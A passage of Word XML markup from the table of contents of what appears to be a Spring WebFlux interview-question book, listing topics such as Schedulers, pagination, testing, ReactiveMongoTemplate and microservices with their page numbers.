                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307994 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>661</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49EC6DAC" w14:textId="5DB40A2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9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onErrorReturn() in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307995 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>663</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E383189" w14:textId="29CE103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9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role of Schedulers in reactive programming with Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307996 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>664</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CD10447" w14:textId="175EE9F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9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Can you explain how to schedule tasks using subscribeOn and publishOn?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307997 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>666</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="199DD16A" w14:textId="05B73BD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9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the concept of event-driven programming in the context of Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307998 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>667</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56779D22" w14:textId="1B8468C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799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does Spring WebFlux handle asynchronous communication in event-driven systems?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307999 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>669</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45D40215" w14:textId="60FE12C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0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would you use Spring WebFlux to implement a simple reactive REST API?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308000 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>671</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7160CC92" w14:textId="00D940B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0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Can you give an example of creating a simple controller using Mono and Flux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308001 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>674</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2995014A" w14:textId="205C2C4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0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would you integrate a database with a Spring WebFlux application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308002 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>676</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="545F3E49" w14:textId="35B618E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0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are the steps to connect a reactive database (like MongoDB or R2DBC) to Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308003 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>680</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64E55E85" w14:textId="63B6E8D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0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would you implement pagination in a reactive Spring WebFlux application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308004 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>684</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E67F2A7" w14:textId="199B0C5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0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would you paginate large datasets using Mono or Flux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308005 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>687</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04D4BE73" w14:textId="39F65CC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0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how you would test a reactive Spring WebFlux service?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308006 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>690</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="709AE3B8" w14:textId="529AD9E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0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ich tools or strategies would you use for testing reactive endpoints?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308007 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>694</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="011EEE8D" w14:textId="0CE0ECA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0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use of ReactiveMongoTemplate in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308008 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>697</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AB24F7F" w14:textId="6EA05CE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0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does it differ from MongoTemplate in traditional Spring applications?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308009 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>699</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45A07E6C" w14:textId="65AAD77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1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does Spring WebFlux compare to Vert.x and Akka HTTP?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308010 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>700</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="391EDEEC" w14:textId="03DBA9C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1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are the pros and cons of using Spring WebFlux compared to other reactive frameworks?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308011 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>702</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="705AD242" w14:textId="2D00549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1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Can Spring WebFlux be used in a traditional servlet container like Tomcat?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308012 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>704</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6741159A" w14:textId="62CFB44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1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If so, what are the limitations when running Spring WebFlux in a servlet container?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308013 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>705</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46E696E0" w14:textId="5599761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1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do you decide whether to use Spring WebFlux or Spring MVC for your application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308014 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>706</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1736F8BA" w14:textId="179920D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1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type of applications are best suited for Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308015 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>707</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32F0B9E2" w14:textId="02262E2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1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do you ensure scalability in a reactive Spring WebFlux application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308016 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>707</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5817E36C" w14:textId="0E197D7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1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would you optimize the performance of a WebFlux application with high traffic?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308017 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>708</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="277C9BA6" w14:textId="7EEFC63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1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Can you explain how you would use Spring WebFlux in a microservice architecture?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308018 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>709</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="726BFAFB" w14:textId="0DFDCAC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1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would you use reactive programming to integrate microservices?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
